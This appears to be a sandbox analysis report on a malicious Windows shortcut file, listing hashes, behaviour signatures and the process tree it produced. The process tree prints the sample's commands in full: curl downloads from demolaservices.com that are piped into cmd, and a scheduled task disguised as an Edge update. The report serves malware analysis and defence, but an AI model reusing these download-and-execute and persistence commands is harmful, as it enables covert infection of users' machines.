Resubmissions

06/03/2024, 15:01

240306-sdvz9sbf8t 7

06/03/2024, 14:59

240306-sc3cysah54 3

06/03/2024, 14:41

240306-r2taxagc37 7

Analysis

  • max time kernel
    33s
  • max time network
    47s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240221-en
  • resource tags
    arch:x64, arch:x86, image:win11-20240221-en, locale:en-us, os:windows11-21h2-x64, system
  • submitted
    06/03/2024, 14:59

General

  • Target

    414d6ed63baaaa69a555068e91e1ee89dbcf38cac7ac4918f6e50fb82d039485.lnk

  • Size

    2KB

  • MD5

    10f4479d5f531def842a712277ae9611

  • SHA1

    bdb075abba517e216a41933cec5b30b4d50c0e76

  • SHA256

    414d6ed63baaaa69a555068e91e1ee89dbcf38cac7ac4918f6e50fb82d039485

  • SHA512

    5306675e38c391bb39a9b4a7bbcbeaf807e2e10bd8e1d5e560e49c77802946b39f033f653954db998d130edb08fc1add8b4dd199c4ab019c4e33fd25fcb57382

Score
3/10

Malware Config

Signatures

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies registry class 1 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\414d6ed63baaaa69a555068e91e1ee89dbcf38cac7ac4918f6e50fb82d039485.lnk
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1724
    • C:\WINDOWS\system32\conhost.exe
      "C:\WINDOWS\system32\conhost.exe" --headless cmd /c curl -o C:\Users\Public\Documents\config.xml demolaservices.com/mml.php & schtasks /create /tn MicrosoftEdgeUpdateEngine /xml C:\Users\Public\Documents\config.xml & msg * "Incompatible Windows version. Try another Windows PC."
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:5024
      • C:\WINDOWS\system32\cmd.exe
        cmd /c curl -o C:\Users\Public\Documents\config.xml demolaservices.com/mml.php & schtasks /create /tn MicrosoftEdgeUpdateEngine /xml C:\Users\Public\Documents\config.xml & msg * "Incompatible Windows version. Try another Windows PC."
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2736
        • C:\Windows\system32\curl.exe
          curl -o C:\Users\Public\Documents\config.xml demolaservices.com/mml.php
          4⤵
            PID:576
          • C:\Windows\system32\schtasks.exe
            schtasks /create /tn MicrosoftEdgeUpdateEngine /xml C:\Users\Public\Documents\config.xml
            4⤵
            • Creates scheduled task(s)
            PID:1856
          • C:\Windows\system32\msg.exe
            msg * "Incompatible Windows version. Try another Windows PC."
            4⤵
              PID:4352
      • C:\Windows\system32\conhost.EXE
        C:\Windows\system32\conhost.EXE --headless cmd /c curl -o C:\Users\public\documents\tmp.jpg demolaservices.com/dxl.php?bb=IDFVLAON_Admin & more C:\Users\public\documents\tmp.jpg | cmd
        1⤵
        • Suspicious use of WriteProcessMemory
        PID:4084
        • C:\Windows\system32\cmd.exe
          cmd /c curl -o C:\Users\public\documents\tmp.jpg demolaservices.com/dxl.php?bb=IDFVLAON_Admin & more C:\Users\public\documents\tmp.jpg | cmd
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:4940
          • C:\Windows\system32\curl.exe
            curl -o C:\Users\public\documents\tmp.jpg demolaservices.com/dxl.php?bb=IDFVLAON_Admin
            3⤵
              PID:3784
            • C:\Windows\system32\more.com
              more C:\Users\public\documents\tmp.jpg
              3⤵
                PID:2796
              • C:\Windows\system32\cmd.exe
                cmd
                3⤵
                  PID:2356
            • C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe
              "C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca
              1⤵
              • Modifies registry class
              • Suspicious use of SetWindowsHookEx
              PID:1908

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat
    Filesize
    10KB
    MD5
    82678367fa4297a26727ccc84e0b2f60
    SHA1
    0c65ab90390566f7d2f5b4751b9027f6bac1d22a
    SHA256
    fbf7356b28e05edc871dda40b318b147e6d07ece028da3d67c3cfbd30bfa0f29
    SHA512
    e5474444eecac25a06fe26a22dce9aa9311740dca264de1c824a36a7bc55216f301e934667fe0b9c3c7b062694f8a37e45ecce6b3889cb33bb47ecb9bd198db5

  • C:\Users\Public\Documents\config.xml
    Filesize
    2KB
    MD5
    1937af09268af0f1ee47eabb62a28f2c
    SHA1
    551433d0819679f3f37e370e2b51e35336194c80
    SHA256
    1ba020416e58b45e42a854dace76cca56bebbdeebfd0abdfb4a33c12a22390d4
    SHA512
    093b9f5a4ff6fe00b7bd2ed113e220f19cc0a96ac2eaf4993ca62a05706a955353a7a7cbaa86f7630883fd680cfb95107249be42da69c94259742d6284f7b94c